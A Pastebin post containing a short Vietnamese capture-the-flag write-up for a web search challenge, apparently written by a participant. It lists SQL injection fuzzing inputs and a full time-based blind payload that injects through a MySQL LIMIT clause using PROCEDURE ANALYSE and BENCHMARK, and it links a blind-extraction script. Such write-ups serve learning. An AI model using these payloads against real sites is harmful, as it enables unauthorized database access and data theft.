Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Web100: sju:pe search engines
- Một trang web search rất nà cơ bản nuôn :3
- Search thử xem post thì thu được kết quả như thế lầy:
- keyword=superfish&limit=2&find=Submit+Query
- Ok đầu tiên mình thử fuzz sqli vào keyword trước, cụ thể:
- + keyword=superfish’-- -
- + keyword=superfish”-- -
- + keyword=superfish’)-- -
- + keyword=superfish”)-- -
- Không trả về kết quả, đoán rằng trường này đã bị filter bằng func mysql_real_escape_string
- Cho qua
- Fuzz limit:
- +limit=2 -- - => OK
- +limit=100 => OK
- +limit=2,1 => OK
- +limit= 2 offset 0 => OK
- Ý đồ của tác giả chắc là injection ở đây rồi.
- Dựa theo kinh nghiệm sqli ở limit thì có 2 dạng, một là sử dụng select case, if else, 2 là sử dụng union based sqli, nhưng không thành công. Thôi thì qua thăm bác google vậy.
- Sau một thời gian quay tay với bác gúc thì cũng đã thành chánh quả :chaymau:
- Để giải quyết bài này mình sử dụng phương pháp Time based blind kết hợp Procedure Analyse:
- Tài liệu: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
- Ok thử phát nào
- keyword=superfish&limit=1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)&find=Submit+Query
- alt + X (hackbar cho bạn nào không biết) và dơ ngón tay ra đếm, 1->2->3->4->5 ->bingo!
- Ok blind thôi:
- <đây là 1 đoạn python mì ăn liền chỉ có hiệu lực trong bài này>
- http://pastebin.com/g7cv7xXd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement